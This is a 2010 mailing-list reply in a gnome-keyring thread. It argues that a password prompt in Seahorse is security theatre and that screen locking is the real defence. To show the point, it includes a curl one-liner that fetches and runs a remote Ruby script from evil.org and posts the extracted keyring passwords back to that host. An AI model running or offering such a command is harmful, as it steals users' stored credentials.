Re: gnome-keyring Passwords freely available after login



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Am Mon, 13 Dec 2010 17:59:52 +0200
schrieb Yaron Sheffer <yaronf gmx com>:
> Seahorse is available on many machines, and any snoop can come by and 
> view the passwords. What Karl is suggesting (I believe) is that the 
> Seahorse *application* should require the login (or keyring?)
> password to be entered, even though as an application, it already has
> access to the passwords.
> 
> I agree with Karl that this would provide real security benefit, even 
> though a smarter attacker, or one who has more time, can install
> another application and access the same secrets.

Sorry but it sounds like some snakeoil if seahorse asks for a password.
It doesn't makes the system more secure. This only seems more security.
Of course it's possible to ask for some password but there are enough
other ways to access the passwords.

In my opinion there are two options:
* Leave everything open and lock the screen every time
* Ask for a password on _every query_ of _every application_. But this
  makes you typing passwords all the time. The Applications should not
  cache the password for security reasons (e.g. locked memory). So you
  have to retype your "master"-password every time your email program
  query the server for new emails, every time you change the
  network, ever time ...

If somebody doesn't believe me how easily it is, to access all
passwords I attached some short script.

It takes only seconds do extract all passwords:

ruby -e "$(curl http://evil.org/discoverall.rb )" | curl -d @-
http://evil.org/receive_passwords.php

In my opinion the User should learn to lock their screen if they
doesn't trust their environment. Gnome-keyring has many options to
protect passwords e.g. automatic locking after some time. This can
really improve the security in contrast of blocking some textfields
with a password.

Florian
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.16 (GNU/Linux)

iQIcBAEBCAAGBQJNBo3jAAoJEDG1ZAdA+6K+et0P/iRNUddQINb5ckWRQ9Uy0u3E
zd8syo4m08gv2/OJXYQWPtd4z5ZeyZ64ye+SarZbJrvAL5kaJJ9L24QDTTr1AnIq
Mu3xoE5beHVXL3UHZQ5RZJqil0g+Dy22eYpvCE2Vrp3NsK+1fpFVPIGDDs+iMCFI
Kj7tIfdSf+7M46Y73nRdQOC4J9y08Ra6UQ4M4WphLcz+0B7xlEJS0PYUOG8y+3qO
fgixcgw6j4S1BCfu2dvl1gLhUhoccxW+v5/EU09J227CZr9GGdQ9R1WW7Ph5MmJo
xEhnZzNZiTDw78qXgJJV0vnJCr3osfyt+N68dGOsOkFsWeCyjddInEP/QMd6saZh
lV5wVKcbEQCuusFSWADrffWt7bm/FaInbhsaGogPsSOrpO6fQ8yzaH3K86GKK7Un
IhIoxcFF9DcjJUHMLo8MXgEJSscDHGe2K5D6qg4vj7kWNCjBPyDOgKX3uLGTte0x
+3PmixsSaK+B9UGayhuiG7R3xDoVszJM7pG/EoYmvI8bGOGcX6PiVjS9dElsghsM
L3kdTEE9/RiNpJTJSn0J6CVuFn2YM8Lly4LmQg0/RRUApqwIXdsFyUewzVRRXMEe
l3UnRSCArrxpnXl1p1b6iT/doRkEohNtze/PXf0ABBE98f1t55c1n7sWDYjArcXx
je4K3VlJFSqJxH4t4od6
=BZd0
-----END PGP SIGNATURE-----

Attachment: discoverall.rb
Description: application/ruby



[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]